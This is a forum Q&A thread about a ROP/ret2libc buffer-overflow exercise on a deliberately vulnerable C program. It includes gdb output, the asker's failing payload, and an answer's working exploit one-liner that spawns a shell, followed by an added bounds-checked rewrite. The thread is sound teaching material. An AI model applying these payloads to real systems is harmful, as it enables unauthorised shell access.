ROP buffer overflow exercise problem

Time: 2019-01-27 20:21:01

Tags: c assembly x86 gdb buffer-overflow

I am working through this buffer overflow exercise, but I can't seem to get it working...

In the "calling arguments" section of the article, he exploits this program by using the variable not_used instead of /bin/date:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char* not_used = "/bin/sh";

void not_called() {
    printf("Not quite a shell...\n");
    system("/bin/date");
}

void vulnerable_function(char* string) {
    char buffer[100];
    strcpy(buffer, string);   /* unbounded copy: the overflow the exercise targets */
}

int main(int argc, char** argv) {
    vulnerable_function(argv[1]);
    return 0;
}

He does this by getting the memory addresses of not_used and system@plt, then overwriting the stack with them:

| 0x8048580 <not_used>             |
| 0x43434343 <fake return address> |
| 0x8048360 <address of system>    |
| 0x42424242 <fake old %ebp>       |
| 0x41414141 ...                   |
|   ... (0x6c bytes of 'A's)       |
|   ... 0x41414141                 |

However, when I try to do this, I only get a Segmentation Fault:

frinto@kali:~/Documents/theclang/programs/rop/argrop$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x122e
(gdb) run
Starting program: /home/frinto/Documents/theclang/programs/rop/argrop/a.out 

Breakpoint 1, 0x5655622e in main ()
(gdb) print 'system@plt'
$1 = {<text variable, no debug info>} 0x56556050 <system@plt>
(gdb) x/s (int)not_used
0x56557008: "/bin/sh"
(gdb) 

Then I built the payload and ran it:

frinto@kali:~/Documents/theclang/programs/rop/argrop$ ./a.out "$(python -c 'print "A"*0x6c + "BBBB" + "\x50\x60\x55\x56" + "CCCC" + "\x08\x70\x55\x56"')"
Segmentation fault

What could be the problem here? Thanks in advance for your help!

P.S. Memory randomization is disabled.

1 answer:

Answer 0 (score: 0)

If NX and ASLR are disabled, just do ret2libc; don't direct it to the function not_called().

I used IDA Pro to find the string address of the not_used variable:

  1. Address of the string /bin/sh = 0x08048530
  2. Address of system() = 0xb7e36da0
  3. Fake return address = JUNK

Exploit:

`python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`

PoC:

% ./vulnerable `python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
$
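For contrast with the exercise's strcpy-based function, here is a hardened replacement for vulnerable_function that refuses any argument that would not fit in the 100-byte buffer. This is an added example written for this page, not code from the question, the answer, or the original article; hardened_function and try_length are hypothetical names, and the inputs the test feeds them are constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 100   /* same size as buffer[100] in the exercise */

/* Hardened counterpart of vulnerable_function(): the length is checked
 * before anything is written, so an over-long argv[1] can never reach
 * the saved %ebp and return address that sit above buffer[].
 * Returns 0 when the string was copied, -1 when it was rejected. */
int hardened_function(const char *string) {
    char buffer[BUF_SIZE];
    /* strnlen stops at BUF_SIZE, so an unterminated input cannot run away */
    size_t len = strnlen(string, BUF_SIZE);
    if (len >= BUF_SIZE) {
        return -1;                 /* would overflow (no room for the NUL) */
    }
    memcpy(buffer, string, len + 1);   /* len + 1 copies the terminator too */
    return 0;
}

/* Probe helper: builds a constructed n-byte string of 'A's, like the
 * padding in the exercise payload, and runs it through the hardened copy.
 * Returns hardened_function's result, or -2 on allocation failure. */
int try_length(size_t n) {
    char *s = malloc(n + 1);
    if (s == NULL) {
        return -2;
    }
    memset(s, 'A', n);
    s[n] = '\0';
    int rc = hardened_function(s);
    free(s);
    return rc;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (hardened_function(argv[1]) != 0) {
        fprintf(stderr, "input of %zu bytes rejected: exceeds buffer\n",
                strlen(argv[1]));
        return 1;
    }
    puts("copied safely");
    return 0;
}
```

The 0x6c-byte padding plus four 4-byte stack slots from the question's payload adds up to 124 bytes, which this version rejects before the copy instead of crashing afterwards.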